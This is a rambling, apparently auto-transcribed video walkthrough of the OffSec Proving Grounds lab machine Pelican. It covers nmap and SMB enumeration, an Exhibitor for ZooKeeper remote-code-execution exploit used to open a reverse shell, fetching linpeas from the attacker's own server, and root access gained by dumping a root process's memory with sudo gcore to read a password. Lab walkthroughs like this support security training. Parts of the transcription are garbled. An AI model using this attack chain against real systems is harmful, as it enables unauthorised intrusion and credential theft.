Hey, I'm NoxLumens, and today we're gonna do Pelican from OffSec. It's their Proving Grounds practice area. It's the one that costs like $20. Anyway, let's just get into it. I'm gonna start off with the nmap, and it's gonna I don't know. I'd like to start with dash per dash, and then very verbose output, and hopefully it will come back with some data pretty quick, and then we can start typing out our next command. So after that, I'm going to hit up a -sc for default scripts, SV to enumerate versions. I'm going to do tac p, and then we're going to start adding in these ports that are appearing up at the top. 22, 80, 80, 139, 445, 631. And then we can go ahead and enter this in. I actually need to copy this whole string of text and then move into my directory that I've created. So let's cd into documents, proving grounds, Pelican. Yeah, we're in there. Now we can do this. And then we're going to output into the nmap format into a file called nmap.md. nmap.md. I need to add a few more of these ports that just appeared. So we're looking at 8081. Oh, damn. 881, 37753, 2222, 2181. 22, 80, 80, 139, 145. I'm sorry, 445, 631, 80, 81, 37, 753, 2222, 2181. Okay, that looks right to me. So we can go ahead and start enumerating, doing some enumeration, looking at some of these, specifically SMB. So let's do SMB client, tac L, dash dash, slash slash. Oh man, I did the thing. Let's try this again. There we go. Slash, and then dash in. So we're trying anonymous login. Let's do something I don't normally do. Let's use SMB map, tac-u, whatever, anonymous, and then the port, it's like dash capital H or something. We'll let that run and show us if we have access. So we don't have access to either of these shares that we're seeing. There's a print drive and IPC. If we were looking inside the IPC, maybe we could look for something that says print drivers, but maybe we look for, like, I don't know, group policy passwords or something like that, something of that nature, which we could take those out and crack them if we wanted to. Anyway, so SMB is essentially going to be out of the question, at least with this user. But go ahead and get the screenshot and add it over to our notes. SMB is that, and then I do like to get the actual command that I ran. And that's in case I want to come back later. So Python, I'm just going to call it Python because it's very colorful. Yeah, so on exams, tests, other boxes, I go back and now I might need to review my other notes. And I find that it really comes in handy. So this right here, this nmap format, this file, this is the benefit of doing or outputting to a file called output.md. You'll have to know that this is exclusive to Obsidian, however. So when I output into the directory where my vault lives into a file called nmap.md, it reverts or returns in this format, and then I'm able to sort through the data exactly the way that I like to. Let's space some of this out so that it's easier to see. Did not follow redirect. Okay. I have a fourth one here. I do. Let's see. NetBIOS name of Pelican. Guest account, challenge response, supported. Just be default. You can try and log in with the guest account, see what shit or access it has. Guest. Ah, shit. Guest. Well, that's doing its thing. Let's look back over here. Java RMI. Pelican OS Java RMI. Guest account doesn't have any access as well, so we're gonna move on. You know what? Let's go to this address and take a look. I'm not gonna work there. Where it redirects us. Okay. So it's taking us to version 1 of exhibitor for Zookeeper. We can look that up. Exhibitor Zookeeper exploit. Remote code execution. I like remote code execution, baby. Clear this out. I imagine we're about to run into an exploit that we need to download. We do. We have some code here. More like instructions. I'll try to make it bigger. So hopefully you can see. So proof of concept. Include a screenshot shows the process of obtaining a root shell on the system. Enter any command surrounded by $, right? Which this is essentially like running the command, right? For example, first shell. So it's giving us. We can see where they're putting it in here. They're putting it in the Java environment header, I guess. Variable, data, table. All those are probably wrong. Let's go back over here and look around. Do we have to do anything? Well, we can just edit this. We don't have to have credentials. Can I make a change here? Commit. Warning you made. Okay, let's where's their shell? They're using netcat. And we do go to rev shells. Rev shell. Actually, yeah, whatever. Revshells.com. I was thinking, should I just try it with netcat? It's probably not, too big of a deal. In bash Python 3. I'm not so sure about this because it has quotes in it, both single and double. Actually, maybe it'll be fine. Maybe it'd be fine because, but it has freaking, oh no, it has parentheses as well. Parentheses, curly brackets, whatever. Yeah, so that might actually cause a problem since that's required. Okay, what about, let's look for a different form. I guess we can just use this. Is that my IP? 192.168.45.231? Yeah. That's what we'll do. Move back over here. So it was saying in this, we could just do something like this. Let's go ahead and spin up our reverse shell. Let's go ahead and spin up our listener. And I guess let's just commit it all at once. Do you want to commit all at once? I'm so sure. Be sure. I might say. Okay. That's doing its thing. Oh, holy shit, dude. And it already came back. Okay, let's write this down. Get this into our notes. Pelican. What port was that even? 8080. We'll copy paste this. Yeah, HTML. Give me something with color, buddy. Whatever. Python. There we go. Okay. So 8080 has this endpoint, and we were able to Google exhibitor and zookeeper exploit. Yes. Where we found that first link. And what is a CVE? There it is. Because we want to make sure that we know the CVE, because when we go to do our write-up, we'll have to use that as a part of it. I guess additionally, we should show our where the vulnerable parameter with our data inside of it. And then additionally, we can show our hostname, ID, and I'll take this whole thing. There we go. Good. Okay, so there's our proof, and then we will do some looking around. See what we can find. So I like to do some things first. Searching for default credentials, searching for what is it? I'm thinking of find. What am I thinking? Find. Perm U plus S. So set UID bits. And then we'll send the rest to dev null. Anything we don't have permission to view. Find perm U plus S. I think that's right. But again, I'm looking for the UID bits. SUID exploit. If we find something, GTF opens exists. So, let's say that a Getty program is on here and it appears, and we have as a set UID bit set. We can come in here and run this and get a reverse show. So there are a few things that stick out. I don't know what this is. Actually, you know what? I'm going to take all this. This is really interesting. The password store, like what? So I'm going to take this whole thing and just add that to my notes, because that'll probably come in handy. I'm going to call this section privilege escalation. And I'm going to take all of this and highlight it. Okay. So password store. I guess something that we can do, locate, come on, linpiece. Before we move further, we can do this Python 3 tac m http.server d for directory. We'll do opt ps. That'll be enough. And then here we can go into cd to temp. Yep. Export term equal to xterm. Now it's going to allow me to clear the screen. Okay, so let's wget http:// 192.168.45.231/linpeas.sh. Output that to linpeas.sh. And then we'll chmod that to add the execute to sh, and then we'll run it linpeas.sh, and we'll send that into a file called piece.txt. This is going to take a little bit to run. It just always does. So I'm going to go ahead and pause, and I'll see you in a second. Okay, we're already undone. Let's cat out piece.txt and make it full screen so I can actually see it. Passwords everywhere, credentials. All great things to look for. Right now, what we want to look for are, we're looking at the reds, and we're also looking for anything highlighted in yellow. Zookeeper.out. If I need to come back slower, then I will. Let's kind of look around. What did I do? There we go. Sorry, I wanted to be able to move up with page up and page down. I need to figure out what the key combination was. It's shift and page up for me. .sh. Oh, there's a ton of stuff to sort through here. Permissions. Here we have this again. Check if sudo. Okay, that's just telling us that maybe check the version of sudo and see if it's vulnerable. Again, password store is looking like the most promising thing. Config. Oh. SMB status only works as root. Just reading. Let's see passwd. See what else. So I like to look for this, and I like to look for cron jobs on these machines. It seems to be two of the methods that OffSec prefers for privilege escalation. That MariaDB might be worth looking at as well. Let's put that to the side. And though I haven't seen the cron jobs appear yet, we can check those. Oh, well, hell, dude, that's something I didn't check for. So I didn't check the set UID bit. Here we go. Okay. Copy. Not set UID. I didn't sudo L to see what privileges we had, if we could run anything elevated. Python. But we can already see user bin gcore, and we can run it. We can run it without whatever. We can run it as an administrator without using our password. Just quickly look over the rest. It doesn't look like there's going to be anything else. But yeah, so the three things, I don't know, I pretty much always should look for, so sudo tac L, and just see what we can run, if anything, as the root user. We're going to check cron jobs. Here's, speaking of, we can already see this. While true, do change owner Charles, opt keeper, and change owner Charles, opt exhibit, and then sleep. I think this means, and I could be wrong, to do it until it's restarted, or I don't know, do it upon reboot. I don't know. But anyway, set UID bits, cron jobs, and sudo tac L. They are exceptionally happy about. They like to put those in a lot. So we can already see this as well. So this tie together with what we were seeing here. These two are related to each other in some manner. So I think that is, what is it? Crontab L? Cron job L? Cat etsy cron? Tab? Okay. Yeah. So the two commands that we just did, cat etsy crontab, that would have shown us, or find in the root, from the root directory, permission of user with the set UID bit set, and then send errors to dev null. So those are the two commands that you would run. The alternative, the other, that would have come in handy. It's if we sudo tac L. So that's actually all three all at once. All three of these appear to be needed in order to perform this, which I think is great. So let's start off by looking at gcore. Yeah, so gcore, let's go to GTFO bins. Let's see what it's showing. Gcore. It does. It also has sudo. Okay. Sudo. There we go. So install, okay. Sudo gcore and then the process ID. If the binary is allowed to run a super user by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate, or maintain privilege. Additionally, it can read files. It reads data from files. It may be used to do privileged reads and disclose files outside of restricted systems. It can be used to generate core dumps of running processes. Such files often contain sensitive information such as open files, contents, cryptographic keys, passwords, etc. This file produces binary file named core.pid that is then often filtered with strings to narrow down relevant information. Okay. So let's do this first. We know cron is running. We know this is running. And it's running that? Yeah, whatever. Root's running this. So let's do ps aux. And we'll print out the processes. And let's look for, we're looking for stuff that root is running, specifically that one process. Here it is. So it's 484. So we're going to do sudo, was it just gcore? Gcore? 484, right? Was that what it was? 484? User password store? Yeah, 484, 484. Oh no, did it do it? It did. Okay, so now let's cat out core.484. Ooh. Let's try Gleam information. User bin, password store, elf, shell. And look at or it's looking like mostly gibberish. Here we go. User Ben password. IGIS core at core. So fork failed. User Ben password. Store. What else should we be looking for in here? So here's my assumption with this. I guess is that it's, I don't know. I guess I just assumed it would show up the password. And maybe it does, and I'm not seeing it. User Ben password. Show Ben password. Show file. User Ben gcore. 44. While true, do change owner, opt, root, Charles, opt, exhibitor. Plus cat core.44. I wonder if it's going to show us different information each time, or if we'll get the same information out. No clock, get time of day. Password root. Clog king pinning 731. If we look plus V, we see these V's occasionally. I bet. Let's just try this. Let's try to first let's clear that out. Su root. Hopefully I copied it. I did. And bash ID. Who am I? I'm root. So let's cd home. Let's cd root. Can I not go to root? And we are. There it is. Okay. That wasn't so bad, right? So we ended up finding this exploit. Ended up finding a few things. So we could sudo with gcore. We went to GTFO bins and we saw. I wonder if it's also possible to do something with this password store program. Anyway, sudo gcore. So it prints out, and then we ended up getting the processes that were running, and we wanted all of root processes. So sh, it was psaux. Not that that's only root processes, but we looked for, what was it again? Bumbling. User bin, password store. For this, process ID 484. And then we were able to sudo user bin vcore. And then the process ID, which was 44. And then we were able to cat, what was it again? Temp 4.44. 4.44. Oh man, I should have gotten I need a screenshot of that. Cat temp 4.44. And in here, somewhere again, see something about a Viking. There it is. So what I'm going to do is highlight it, showing that the password is there. Kind of hard to see. SH. Go. And then there's our proof that it's actually in there. And then we now need proof that we are who we say we are. Hostname, ID, who am I? Excellent. There we go. All right, well, very, very interesting stuff. That was Pelican. OffSec's Proving Grounds. Practice. Play. Hope that you learned something. Hope that you learned a little bit about the things that I look for personally when I'm going through some of these boxes. It was kind of interesting how quick of a win that was. But I did like that there was something kind of with every path, right? So we saw the password. Password store had the SUID bit. We would have sudo L, like this should have been like our first thing that we did. We would have seen the G core. We were able to use GTFO bins. GTFO bins comes in handy so often. So bookmark it or keep it in mind. It offers a lot of free wins. Anyway, I hope that you had a good time. I hope that you learned something, and I will see you in the next one. Bye-bye.